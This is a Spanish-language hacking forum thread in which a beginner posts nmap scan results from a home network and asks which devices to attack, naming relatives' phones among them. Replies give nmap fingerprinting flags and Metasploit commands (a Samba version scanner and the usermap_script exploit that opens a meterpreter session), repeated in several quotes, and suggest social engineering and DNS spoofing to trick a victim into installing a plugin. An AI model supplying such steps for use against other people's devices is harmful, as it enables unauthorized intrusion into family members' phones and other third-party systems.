Buenas Grupo, he instalado metasploit pero no se por donde empezar, le pase el nmap y me derivo estos datos:-> nmap -sV 192.168.0.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-30 22:20 CET
Nmap scan report for 192.168.0.1
Host is up (0.0034s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
23/tcp closed telnet
80/tcp open tcpwrapped
1900/tcp open http Cisco DPC3828S WiFi cable modem
8080/tcp closed http-proxy
8082/tcp open http Mongoose httpd
MAC Address: A4:08:F5:E0:13:8C (Sagemcom Broadband SAS)
Service Info: Device: WAP; CPE: cpe:/h:cisco:dpc3828s
Nmap scan report for 192.168.0.158
Host is up (0.0020s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
443/tcp open ssl/http TiVo To Go httpd 20.6.4.RC40-SAG-11:B55
1503/tcp open websocket libwebsockets
2191/tcp open tvbus?
9080/tcp closed glrpc
MAC Address: A0:39:EE:0D:B4:C3 (Unknown)
Service Info: Device: media device
Nmap scan report for 192.168.0.159
Host is up (0.0042s latency).
All 1000 scanned ports on 192.168.0.159 are closed
MAC Address: 80:5A:04:DC:5C:AC (LG Electronics (Mobile Communications))
Nmap scan report for 192.168.0.161
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.0.161 are closed
MAC Address: 84:B5:41:0F:37:CA (Samsung Electronics)
Nmap scan report for 192.168.0.163
Host is up (0.0025s latency).
All 1000 scanned ports on 192.168.0.163 are closed
MAC Address: 50:C8:E5:C7:DB:CD (Samsung Electronics)
Nmap scan report for 192.168.0.167
Host is up (0.0082s latency).
All 1000 scanned ports on 192.168.0.167 are closed
MAC Address: 5C:AF:06:0A:57:EF (LG Electronics (Mobile Communications))
Nmap scan report for 192.168.0.175
Host is up (0.0022s latency).
All 1000 scanned ports on 192.168.0.175 are closed
MAC Address: 7C:F9:0E:F6:5A:E5 (Samsung Electronics)
Nmap scan report for 192.168.0.178
Host is up (0.0052s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
9000/tcp open upnp TwonkyMedia UPnP (UPnP 1.0; pvConnect SDK 1.0; Twonky SDK 1.1)
MAC Address: A4:08:F5:E0:13:8D (Sagemcom Broadband SAS)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2
Nmap scan report for 192.168.0.166
Host is up (0.000073s latency).
All 1000 scanned ports on 192.168.0.166 are closed
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 254 IP addresses (9 hosts up) scanned in 148.37 seconds
Cual objetivo seria interesante atacar? la mitat son telefonos xD mi madre, brother etc...
Gracias
192.168.0.1 (el ruter supongo, ofrece servicios interesantes)
192.168.0.178 (si no me equivoco hay un exploit para el servicio samba)
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
192.168.0.1 (el ruter supongo, ofrece servicios interesantes)
192.168.0.178 (si no me equivoco hay un exploit para el servicio samba)
Gracias por responder, que se le podria hacer al router? La ip 178 creo que esta asignada a mi pc kali linux 😄.
Podria sacar pass admin?
Y otra pregunta, que no encuentro, atacar a teléfonos conectados a red lan, podria?
Porque todo lo que veo en youtube es creando un payload multi handler y mandarselo y esperar a qye pique. ..
Hola necesitas un poco mas de informacion ,
nmap -sV -sS -O -A -d2 192.168.0.1-254 // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed Dispositivos sin firewall
- filtered Dispositivos con firewall
reset ttl xxx Es el sistema operativo que tu exploit necesitara , un ejemplo windows 10 da un resultado como este, reset ttl 128
Lista de TTL - https://subinsb.com/default-device-ttl-values/
Cuando el resultado es este / All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo
nmap -sV -sS -O -A -d2 -Pn 192.168.xx
Una ves teniendo las vulnerabilidades , el sistema , el estatus del firewall , pasas al siguiente paso msf
msfconsole
msf>search scanner/samba
msf>use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.x.xxx
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) , Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.x.xxx
El exploit te abrira tu session de meterpreter ..
Los dispositivos que tienen Firewall / IDS / Intelligence Prevention , Necesitaras guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port
@m3tr4l14 (https://underc0de.org/foro/index.php?action=profile;u=67545)
Hola lo que dice @jonathanvlan (https://underc0de.org/foro/index.php?action=profile;u=91927) esta correcto y es una buena ayuda.
Pero te recomiendo que si estás practicando, te recomiendo metasploit, pero si estás llendo más haya (practicando igualmente pero con niveles de dificultad), te recomiendo que usas diferentes programas y/o mucho mejor que crees tú propia carga útil ya que así no sólo practicadas la programación ya que te volverás creativo y tendrás mas ventaja contra sistemas/programas de protección.
Si deseas atacar un dispositivo "remotamente", puedes optar por la ing. social y el dns spoofing. Insitando a que la victima tenga que instalar un plugin o algo por el estilo.
Te recomiendo metasploit así tengas conocimientos amplias para la pre explotación.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola necesitas un poco mas de informacion ,
nmap -sV -sS -O -A -d2 192.168.0.1-254 // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed Dispositivos sin firewall
- filtered Dispositivos con firewall
reset ttl xxx Es el sistema operativo que tu exploit necesitara , un ejemplo windows 10 da un resultado como este, reset ttl 128
Lista de TTL - https://subinsb.com/default-device-ttl-values/
Cuando el resultado es este / All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo
nmap -sV -sS -O -A -d2 -Pn 192.168.xx
Una ves teniendo las vulnerabilidades , el sistema , el estatus del firewall , pasas al siguiente paso msf
msfconsole
msf>search scanner/samba
msf>use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.x.xxx
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) , Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.x.xxx
El exploit te abrira tu session de meterpreter ..
Los dispositivos que tienen Firewall / IDS / Intelligence Prevention , Necesitaras guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port
waoo eres un crack 😝😝😝. Esto serviria para los teléfonos androids conectados? Ya que pc pocos 😂 el mio y tirando.
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
@m3tr4l14 (https://underc0de.org/foro/index.php?action=profile;u=67545)
Hola lo que dice @jonathanvlan (https://underc0de.org/foro/index.php?action=profile;u=91927) esta correcto y es una buena ayuda.
Pero te recomiendo que si estás practicando, te recomiendo metasploit, pero si estás llendo más haya (practicando igualmente pero con niveles de dificultad), te recomiendo que usas diferentes programas y/o mucho mejor que crees tú propia carga útil ya que así no sólo practicadas la programación ya que te volverás creativo y tendrás mas ventaja contra sistemas/programas de protección.
Si deseas atacar un dispositivo "remotamente", puedes optar por la ing. social y el dns spoofing. Insitando a que la victima tenga que instalar un plugin o algo por el estilo.
Te recomiendo metasploit así tengas conocimientos amplias para la pre explotación.
jeje gracias por responder, si cuando termine de estudiar vere de ser creativo, q ahora en epoca de exámenes. ...
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Hola necesitas un poco mas de informacion ,
nmap -sV -sS -O -A -d2 192.168.0.1-254 // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed Dispositivos sin firewall
- filtered Dispositivos con firewall
reset ttl xxx Es el sistema operativo que tu exploit necesitara , un ejemplo windows 10 da un resultado como este, reset ttl 128
Lista de TTL - https://subinsb.com/default-device-ttl-values/
Cuando el resultado es este / All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo
nmap -sV -sS -O -A -d2 -Pn 192.168.xx
Una ves teniendo las vulnerabilidades , el sistema , el estatus del firewall , pasas al siguiente paso msf
msfconsole
msf>search scanner/samba
msf>use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.x.xxx
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) , Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.x.xxx
El exploit te abrira tu session de meterpreter ..
Los dispositivos que tienen Firewall / IDS / Intelligence Prevention , Necesitaras guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port
Nada no me aclaro :( ... estoy en la biblioteca y me lanza demasiados datos 😂... filtered, no tendras algun videotutorial? Te mande un Email pd
@m3tr4l14 (https://underc0de.org/foro/index.php?action=profile;u=67545)Te recomiendo este vídeo: